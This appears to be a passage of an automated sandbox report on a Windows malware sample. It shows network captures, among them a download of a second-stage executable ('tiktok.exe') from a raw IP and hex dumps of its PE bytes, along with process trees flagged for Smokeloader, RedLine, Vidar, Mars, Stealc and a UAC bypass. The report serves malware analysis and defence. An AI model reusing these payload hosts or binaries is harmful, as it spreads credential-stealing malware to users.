                                                                                                                                                                                                                                    Apr 27, 2024 01:31:29.373740911 CEST1289INData Raw: 00 00 00 00 00 00 04 53 65 6c 66 02 00 00 9c 27 40 00 01 00 03 50 74 72 02 00 02 b8 12 40 00 02 00 05 56 61 6c 75 65 02 00 00 9c 10 40 00 0c 00 0f 4d 61 78 43 68 61 72 73 49 6e 63 4e 75 6c 6c 02 00 00 cc 10 40 00 08 00 08 43 6f 64 65 50 61 67 65
                                                                                                                                                                                                                                    Data Ascii: Self'@Ptr@Value@MaxCharsIncNull@CodePages@WriteStringAsAnsiSelf'@PtrT@Ofs@Value@MaxCharsIncNull@WriteStringAsAnsiS


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    6192.168.2.44974520.157.87.45803704C:\Users\user\AppData\Local\Temp\u5qk.3.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:01.434885025 CEST266OUTPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Content-Length: 300
                                                                                                                                                                                                                                    Host: svc.iolo.com
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                    User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:01.635178089 CEST300OUTData Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 66 46 76 61 45 49 51 2b 2f 6c 33 6e 69 78 46 78 62 4d 79 2b 36 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62
                                                                                                                                                                                                                                    Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAfFvaEIQ+/l3nixFxbMy+62osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:01.842859983 CEST469INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    cache-control: private
                                                                                                                                                                                                                                    content-length: 256
                                                                                                                                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                    x-whom: Ioloweb9
                                                                                                                                                                                                                                    date: Fri, 26 Apr 2024 23:32:01 GMT
                                                                                                                                                                                                                                    set-cookie: SERVERID=svc9; path=/
                                                                                                                                                                                                                                    connection: close
                                                                                                                                                                                                                                    Data Raw: 31 33 32 62 68 5a 33 4d 56 38 47 36 64 71 53 38 4c 68 46 6d 33 71 59 50 6f 4a 44 73 46 59 47 5a 70 75 54 32 2b 37 36 66 6f 6e 75 4b 30 71 57 64 75 67 30 6b 30 70 75 48 51 4a 2f 66 61 70 67 77 74 64 4f 58 51 72 79 6c 55 6c 2f 68 70 6c 34 34 77 75 67 69 4f 32 2f 4b 6d 7a 6f 53 4c 72 54 45 55 6f 48 62 4d 42 42 67 31 47 54 69 4e 4e 32 63 6d 75 6d 50 77 44 71 31 6d 6a 77 55 37 4e 53 74 5a 6b 6c 61 2b 58 79 47 77 54 6e 78 65 43 69 2b 4e 4d 45 63 47 70 31 32 65 33 6f 70 53 41 39 50 4a 46 62 53 5a 36 38 53 45 41 4c 54 76 7a 4f 7a 30 53 30 42 6a 6f 4c 65 42 30 6a 63 5a 36 45 54 63 6f 77 4e 31 2f 58 32 4b 70 7a 78 31 48 54 4c 69 70 4b 4b 76 30 54 52 58 32 6b 49 67 44 35 52 30 6c 4d 6b 61 4c 6b 6c 6d 7a 6c 6f 54 64 4c 47 7a 35 6c 79 45 65 4a 6e 66 79 53 76 79 4d 66 32
                                                                                                                                                                                                                                    Data Ascii: 132bhZ3MV8G6dqS8LhFm3qYPoJDsFYGZpuT2+76fonuK0qWdug0k0puHQJ/fapgwtdOXQrylUl/hpl44wugiO2/KmzoSLrTEUoHbMBBg1GTiNN2cmumPwDq1mjwU7NStZkla+XyGwTnxeCi+NMEcGp12e3opSA9PJFbSZ68SEALTvzOz0S0BjoLeB0jcZ6ETcowN1/X2Kpzx1HTLipKKv0TRX2kIgD5R0lMkaLklmzloTdLGz5lyEeJnfySvyMf2


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    7192.168.2.44975720.157.87.45803704C:\Users\user\AppData\Local\Temp\u5qk.3.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:15.986619949 CEST266OUTPOST /__svc/sbv/DownloadManager.ashx HTTP/1.0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Content-Length: 300
                                                                                                                                                                                                                                    Host: svc.iolo.com
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                    User-Agent: Mozilla/3.0 (compatible; Indy Library)
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:16.183234930 CEST300OUTData Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 74 69 53 56 57 6f 48 52 30 44 67 2b 47 4d 38 61 53 79 38 54 4c 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62
                                                                                                                                                                                                                                    Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAtiSVWoHR0Dg+GM8aSy8TL2osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tC
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:16.374836922 CEST405INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    cache-control: private
                                                                                                                                                                                                                                    content-length: 192
                                                                                                                                                                                                                                    content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                    x-whom: Ioloweb7
                                                                                                                                                                                                                                    date: Fri, 26 Apr 2024 23:32:15 GMT
                                                                                                                                                                                                                                    set-cookie: SERVERID=svc7; path=/
                                                                                                                                                                                                                                    connection: close
                                                                                                                                                                                                                                    Data Raw: 39 76 37 59 43 62 54 6a 68 53 4f 54 65 7a 71 52 74 42 41 38 44 61 46 35 46 43 52 49 72 4c 62 32 49 6c 78 6c 34 38 6a 4b 61 69 32 6d 65 6d 45 6e 73 33 69 48 76 54 35 4c 2b 48 33 43 49 6c 49 68 4f 6f 33 44 5a 35 33 6d 6c 6a 61 38 4b 42 32 59 45 49 73 2f 6a 31 50 54 39 36 78 49 73 73 61 66 69 37 62 44 69 4d 64 6b 2f 49 41 58 37 55 4a 75 55 59 31 35 61 38 31 67 4d 75 75 46 5a 4c 41 54 67 2b 42 39 62 35 69 4b 57 33 77 6f 49 4f 50 6c 6f 49 59 4a 45 65 78 30 33 62 6f 4c 51 68 4f 49 70 2b 4f 45 77 34 6a 52 4c 48 75 52 75 35 62 44 2b 34 61 49 49 42 63 42 43 43 69 6d 2b 6b 4e 53
                                                                                                                                                                                                                                    Data Ascii: 9v7YCbTjhSOTezqRtBA8DaF5FCRIrLb2Ilxl48jKai2memEns3iHvT5L+H3CIlIhOo3DZ53mlja8KB2YEIs/j1PT96xIssafi7bDiMdk/IAX7UJuUY15a81gMuuFZLATg+B9b5iKW3woIOPloIYJEex03boLQhOIp+OEw4jRLHuRu5bD+4aIIBcBCCim+kNS


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    8192.168.2.449758185.172.128.203807516C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:20.918322086 CEST76OUTGET /tiktok.exe HTTP/1.1
                                                                                                                                                                                                                                    Host: 185.172.128.203
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:21.090145111 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:21 GMT
                                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                                    Last-Modified: Wed, 24 Apr 2024 21:15:46 GMT
                                                                                                                                                                                                                                    ETag: "85400-616de2c892480"
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Content-Length: 545792
                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$c'i'i'i[7iYiX8i73i7i7i.9"i'i}i7%i7U&i'i=&i7&iRich'iPELv)f@@P(@( lp @.text1 `.rdata@@.data@ @.gfids@@.rsrc@(*@@.relocl @B [TRUNCATED]
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:21.090199947 CEST1289INData Raw: 46 00 e8 1c 73 05 00 59 c3 68 09 bf 46 00 e8 10 73 05 00 59 c3 68 13 bf 46 00 e8 04 73 05 00 59 c3 68 1d bf 46 00 e8 f8 72 05 00 59 c3 b9 a0 bd 47 00 e8 71 56 05 00 68 27 bf 46 00 e8 e2 72 05 00 59 c3 55 8b ec 83 ec 0c a1 6c b0 47 00 33 c5 89 45
                                                                                                                                                                                                                                    Data Ascii: FsYhFsYhFsYhFrYGqVh'FrYUlG3EUEVUNEQWFPfyM3^{k]UVWFPFfEPy^]IpvGEUVFFPyEtj
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:21.090255976 CEST1289INData Raw: 3e 00 75 64 6a 18 e8 06 69 05 00 8b f8 83 c4 04 89 7d 08 8b 4d 0c c7 45 fc 00 00 00 00 8b 51 04 85 d2 75 07 b9 a0 76 47 00 eb 0a 8b 4a 18 85 c9 75 03 8d 4a 1c 51 8d 4d ac e8 dc fb ff ff 8d 45 e0 c7 47 04 00 00 00 00 50 c7 07 58 c7 46 00 e8 90 58
                                                                                                                                                                                                                                    Data Ascii: >udji}MEQuvGJuJQMEGPXFXMG>MdY_^]UAPEPX]US]3Vu+W3;uGtAEPPyXGEF;u_^[]
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:21.090336084 CEST1289INData Raw: 01 8a 08 40 84 c9 75 f9 2b c2 3b f0 72 e3 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 53 8b dc 83 ec 08 83 e4 f8 83 c4 04 55 8b 6b 04 89 6c 24 04 8b ec 6a ff 68 55 ba 46 00 64 a1 00 00 00 00 50 53 81 ec 80 00 00 00 a1 6c b0 47 00 33
                                                                                                                                                                                                                                    Data Ascii: @u+;r_^]SUkl$jhUFdPSlG3EVWPEd(~GGG0G)88z(|G G4G`%Z/8G,QWEhGMEE~r>?u3QAu+QjEP
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:21.090419054 CEST1289INData Raw: 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d c4 33 d2 e8 33 f8 ff ff c7 45 c4 00 00 00 00 c6 45 fc 0c 8b 4d d4 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 45 d8 85 c0 74 12 f0 0f c1 70 20 4e 75 0a 8b 4d d8 33 d2 e8 f3
                                                                                                                                                                                                                                    Data Ascii: tA uM33EEMt@tjEtp NuM3EEMt@tj(p}GGGG31zG`%Z/GQWEhGMEE~r>?u3
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:21.090468884 CEST1289INData Raw: 3b f3 ff ff c7 45 88 00 00 00 00 c6 45 fc 1c 8b 4d 98 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 4d 9c 85 c9 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d 9c 33 d2 e8 fa f2 ff ff c7 45 9c 00 00 00 00 c6 45 fc 1d 8b 4d
                                                                                                                                                                                                                                    Data Ascii: ;EEMt@tjMtA uM3EEMt@tjMtA uM3EEMt@tjMtA uM3xEEMt@tjE
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:21.090540886 CEST1289INData Raw: 0f 00 00 00 c7 41 10 00 00 00 00 50 c6 01 00 e8 62 05 00 00 e8 cd 32 05 00 83 c4 18 83 7c 24 1c 00 76 57 ff 15 cc c9 47 00 8b 44 24 1c 40 50 6a 02 ff 15 c0 c9 47 00 8b f0 85 f6 74 3d 83 7c 24 20 10 8d 54 24 0c 8b 4c 24 1c 0f 43 54 24 0c 41 51 52
                                                                                                                                                                                                                                    Data Ascii: APb2|$vWGD$@PjGt=|$ T$L$CT$AQRVGPGVGVjGVGD$ r@L$Pt$D$ D$D$|$8D$$D$4CD$$GhG6'@'@#(@(@*)@*)@
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:21.090584040 CEST1289INData Raw: 10 89 7e 10 72 0e 8b 06 5f c6 00 00 8b c6 5e 5b 5d c2 08 00 8b c6 5f 5e 5b c6 00 00 5d c2 08 00 8b c6 85 ff 74 0b 57 53 50 e8 5f 71 05 00 83 c4 0c 83 7e 14 10 89 7e 10 72 0f 8b 06 c6 04 38 00 8b c6 5f 5e 5b 5d c2 08 00 8b c6 c6 04 38 00 5f 8b c6
                                                                                                                                                                                                                                    Data Ascii: ~r_^[]_^[]tWSP_q~~r8_^[]8_^[]hvG>US]VMWC;}+;G;uG99FF~rQj_^[]Qj_^[]9~s$vW
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:21.090610981 CEST1289INData Raw: 3b 46 10 76 04 85 c0 75 9b 8b 4e 10 3b c1 77 19 89 46 10 83 7e 14 10 72 08 8b 0e c6 04 01 00 eb 14 8b ce c6 04 01 00 eb 0c 2b c1 8b ce 6a 00 50 e8 ff fd ff ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc
                                                                                                                                                                                                                                    Data Ascii: ;FvuN;wF~r+jPMdY_^[]UAPuuuu;y]3]UjhpFdPSVWlG3PEdeuEv'^;v<+
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:21.090682983 CEST1289INData Raw: e8 99 30 05 00 83 c4 04 8d 4d e4 e8 d5 2e 05 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d ec 33 cd e8 93 43 05 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 0f 57 c0 8d 46 04 50 c7 06 ac c1 46 00 66 0f d6 00
                                                                                                                                                                                                                                    Data Ascii: 0M.MdY_^[M3C]UVWFPFfEPQLF^]VNt$F+PQFFF^Vt#F+PQFF^UjhFdPPVWl
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:21.261603117 CEST1289INData Raw: c7 00 00 00 00 00 6a 01 8b 01 ff 10 85 f6 75 e9 6a 00 6a 00 c7 47 24 00 00 00 00 e8 9c 6b 05 00 cc cc 56 8b f1 8b 4e 40 85 c9 74 24 8b 46 48 2b c1 c1 f8 03 50 51 e8 b7 03 00 00 c7 46 40 00 00 00 00 c7 46 44 00 00 00 00 c7 46 48 00 00 00 00 8b 4e
                                                                                                                                                                                                                                    Data Ascii: jujjG$kVN@t$FH+PQF@FDFHN4t$F<+PQF4F8F<N$t$F,+PQF$F(F,Nt$F+PQ6FFFNt$F+PQFF


                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                    Start time:01:31:07
                                                                                                                                                                                                                                    Start date:27/04/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\VucRf0jboS.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\VucRf0jboS.exe"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:441'857 bytes
                                                                                                                                                                                                                                    MD5 hash:5CD97A765E0C9463F57769117DB519FA
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.2187851077.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2368576914.00000000041E5000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:1
                                                                                                                                                                                                                                    Start time:01:31:13
                                                                                                                                                                                                                                    Start date:27/04/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\u5qk.0.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\u5qk.0.exe"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:294'400 bytes
                                                                                                                                                                                                                                    MD5 hash:17342752EC286810D28AA4F324C3E8E5
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2492933650.0000000004054000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000003.1758935505.0000000005CA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000003.1758935505.0000000005CA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2493025545.00000000040A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                    Start time:01:31:28
                                                                                                                                                                                                                                    Start date:27/04/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe"
                                                                                                                                                                                                                                    Imagebase:0xb90000
                                                                                                                                                                                                                                    File size:2'469'936 bytes
                                                                                                                                                                                                                                    MD5 hash:9FB4770CED09AAE3B437C1C6EB6D7334
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:6
                                                                                                                                                                                                                                    Start time:01:31:31
                                                                                                                                                                                                                                    Start date:27/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    Imagebase:0x240000
                                                                                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2326661645.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.2326661645.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                    Start time:01:31:31
                                                                                                                                                                                                                                    Start date:27/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                    Start time:01:31:56
                                                                                                                                                                                                                                    Start date:27/04/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\u5qk.3.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\u5qk.3.exe"
                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                    File size:4'866'096 bytes
                                                                                                                                                                                                                                    MD5 hash:397926927BCA55BE4A77839B1C44DE6E
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.2186967041.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe, Author: Joe Security
                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                    • Detection: 4%, ReversingLabs
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                                    Start time:01:31:56
                                                                                                                                                                                                                                    Start date:27/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1168
                                                                                                                                                                                                                                    Imagebase:0x610000
                                                                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                    Target ID:13
                                                                                                                                                                                                                                    Start time:01:32:00
                                                                                                                                                                                                                                    Start date:27/04/2024
                                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                    Imagebase:0x110000
                                                                                                                                                                                                                                    File size:262'432 bytes
                                                                                                                                                                                                                                    MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                                    Start time:01:32:00
                                                                                                                                                                                                                                    Start date:27/04/2024
                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe
